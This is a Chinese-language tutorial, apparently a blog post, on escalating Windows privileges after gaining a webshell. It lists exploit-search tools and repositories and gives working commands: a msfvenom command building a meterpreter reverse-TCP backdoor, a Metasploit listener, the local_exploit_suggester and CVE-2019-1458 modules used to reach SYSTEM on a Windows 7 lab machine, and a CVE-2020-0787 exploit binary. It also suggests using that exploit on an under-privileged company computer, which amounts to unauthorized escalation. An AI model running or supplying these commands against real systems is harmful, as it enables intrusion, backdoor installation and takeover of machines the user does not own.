在整个提权项目中,前提是拿到webshell。
关于系统的溢出漏洞,我推荐两个项目:
https://github.com/chroblert/WindowsVulnScan
首先用powershell执行ps1文件,在本地会生成json文件来存放系统补丁信息
json文件
python cve-check.py -C -f KB.json
然后在执行py文件,它会将可用的exp显示出来。
https://github.com/bitsadmin/wesng
在目标机上执行systeminfo命令
然后将获取到的信息复制到脚本同一目录下的system.txt中。
执行命令 python wes.py system.txt -o vulns.csv
推荐项目:
https://github.com/Ascotbe/KernelHub 针对常用溢出编号指定找EXP
https://github.com/nomi-sec/PoC-in-GitHub 针对年份及编号指定找EXP
https://github.com/offensive-security/exploitdb 针对类型及关键说明指定找EXP
)https://github.com/SecWiki/windows-kernel-exploits 项目收集的EXP
不同脚本Webshell权限不一致,一般jsp java权限默认系统权限,php aspx asp普通低权限。
先用msf生成一个后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=3333 -f exe -o msf.exe
设置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
exploit
我用的是虚拟机win7,当的靶机,为了方便,我就直接执行后门了。
上线,获得低权限。
使用自带模块提权use multi/recon/local_exploit_suggester
找到可利用cve漏洞
使用exp use windows/local/cve_2019_1458_wizardopium
设置session会话 session 2
获得最高权限
CVE-2020-0787提权
在某些环境下,比如一个公司中,你拥有一台公司电脑,但是你权限不够,就可以试试该方法。
使用该exp:BitsArbitraryFileMoveExploit.exe
如果主机没打补丁,就可能利用成功。
跳出cmd窗口,获得system权限。